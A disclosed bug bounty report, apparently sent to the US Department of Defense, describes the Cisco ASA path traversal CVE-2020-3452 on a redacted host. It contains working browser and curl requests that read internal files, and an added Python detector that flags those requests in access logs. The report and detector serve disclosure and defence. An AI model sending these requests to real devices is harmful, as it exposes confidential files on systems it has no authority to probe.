███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

Disclosed: 2020-09-03 17:24:29 By secret_letters To deptofdefense
High
## Vulnerability Details
**Summary:** ████████ is vulnerable to a Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

**Description:** GET request parameters at `/+CSCOT+/translation-table` and `/+CSCOT+/oem-customization` are not properly sanitized, which allows for reading files within the webroot directory that are not intended to be readable.

According to Cisco: The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.

## Step-by-step Reproduction Instructions

### In Browser:

1. Copy and paste into your browser: `███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../`
2. Note the file being requested to be downloaded. This will be the source code for portal_inc.lua, which is not normally accessible.

### In curl:

1. `curl -k "████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"` to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.
2. Various internal files can be read, and some require using the --output command to output the data to a file as shown in step 3.
3. `curl -k "█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=../" --output session.js`

## Product, Version, and Configuration (If applicable)

- AnyConnect SSL VPN - webvpn
- Clientless SSL VPN - webvpn

## Suggested Mitigation/Remediation Actions

Update the software to the latest version via the Cisco advisory linked above in the Summary.

## Impact

An attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features.

CVSS Score: Base 7.5
Vector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
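Detection logic for the request pattern described in this report, added here as an example and not part of the original report or of any Cisco tooling. It assumes request lines in combined-format access logs from a reverse proxy or WAF placed in front of the VPN portal (the sample log lines are constructed); the handler paths and the `%2bCSCOE%2b` / `lang=../` pattern are taken from the report, and the decoder also catches double-encoded variants, which the report does not show.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Handlers named in the report and the Cisco advisory.
AFFECTED_PATHS = ("/+CSCOT+/translation-table", "/+CSCOT+/oem-customization")
# A '..' path segment; matched only after percent-decoding.
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so %252e%252e%2f reduces to '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_cve_2020_3452_probe(request_target):
    """True if an affected handler is requested with a '..' segment anywhere."""
    parts = urlsplit(request_target)
    path = fully_decode(parts.path)
    if not any(path.startswith(p) for p in AFFECTED_PATHS):
        return False
    candidates = [path]
    # parse_qsl decodes one layer; decode again to catch double-encoded values.
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        candidates.extend((fully_decode(key), fully_decode(val)))
    return any(TRAVERSAL.search(c) for c in candidates)

def scan_access_log(lines):
    """Return (line_number, request_target) for every matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match and is_cve_2020_3452_probe(match.group(1)):
            hits.append((number, match.group(1)))
    return hits

# Constructed sample lines (not from the report): the report's translation-table
# request, a benign request to the same handler, and an unrelated request.
SAMPLE_LOG = [
    '198.51.100.9 - - [03/Sep/2020:17:24:29 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5120',
    '198.51.100.9 - - [03/Sep/2020:17:25:10 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 310',
    '192.0.2.44 - - [03/Sep/2020:17:26:02 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2048',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags only the first line; a legitimate translation-table request with `lang=en` is left alone.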
Report Stats
  • Report ID: 959187
  • State: Closed
  • Substate: resolved
  • Upvotes: 17